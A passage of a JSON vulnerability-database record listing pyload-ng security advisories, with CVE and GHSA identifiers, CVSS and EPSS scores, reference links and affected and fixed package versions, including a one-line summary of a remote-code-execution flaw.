"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7346" }, { "reference_url": "https://github.com/advisories/GHSA-2wcm-vx67-3x4q", "reference_id": "GHSA-2wcm-vx67-3x4q", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-2wcm-vx67-3x4q" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5", "reference_id": 
"GHSA-x698-5hjm-w2m5", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38751?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev78", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { 
"vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev78" } ], "aliases": [ "GHSA-2wcm-vx67-3x4q" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xhbh-mwv5-wfgf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47548?format=api", "vulnerability_id": "VCID-xs39-z9t4-wyh9", "summary": "pyLoad allows upload to arbitrary folder leading to RCE\nAn authenticated user can change the download folder and upload a crafted template to the specified folder, leading to remote code execution", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-32880", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.04609", "scoring_system": "epss", "scoring_elements": "0.89459", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-32880" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32880", "reference_id": "CVE-2024-32880", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32880" }, { "reference_url": "https://github.com/advisories/GHSA-3f7w-p8vr-4v5f", "reference_id": "GHSA-3f7w-p8vr-4v5f", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], 
"url": "https://github.com/advisories/GHSA-3f7w-p8vr-4v5f" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-3f7w-p8vr-4v5f", "reference_id": "GHSA-3f7w-p8vr-4v5f", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-04-26T18:47:38Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-3f7w-p8vr-4v5f" } ], "fixed_packages": [], "aliases": [ "CVE-2024-32880", "GHSA-3f7w-p8vr-4v5f" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xs39-z9t4-wyh9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57773?format=api", "vulnerability_id": "VCID-yk3e-d92p-cubu", "summary": "Duplicate\nThis advisory duplicates another.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-54802", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02893", "scoring_system": "epss", "scoring_elements": "0.8661", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-54802" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/70a44fe02c03bce92337b5d370d2a45caa4de3d4", "reference_id": "", "reference_type": "", 
"scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/" } ], "url": "https://github.com/pyload/pyload/commit/70a44fe02c03bce92337b5d370d2a45caa4de3d4" }, { "reference_url": "https://github.com/pyload/pyload/pull/4596", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/" } ], "url": "https://github.com/pyload/pyload/pull/4596" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54802", "reference_id": "CVE-2025-54802", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54802" }, { "reference_url": "https://github.com/advisories/GHSA-48rp-jc79-2264", "reference_id": "GHSA-48rp-jc79-2264", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-48rp-jc79-2264" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-48rp-jc79-2264", "reference_id": "GHSA-48rp-jc79-2264", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", 
"scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-05T14:29:40Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-48rp-jc79-2264" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48574?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev90", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev90" } ], "aliases": [ "CVE-2025-54802", "GHSA-48rp-jc79-2264" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yk3e-d92p-cubu" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0a5.dev532" }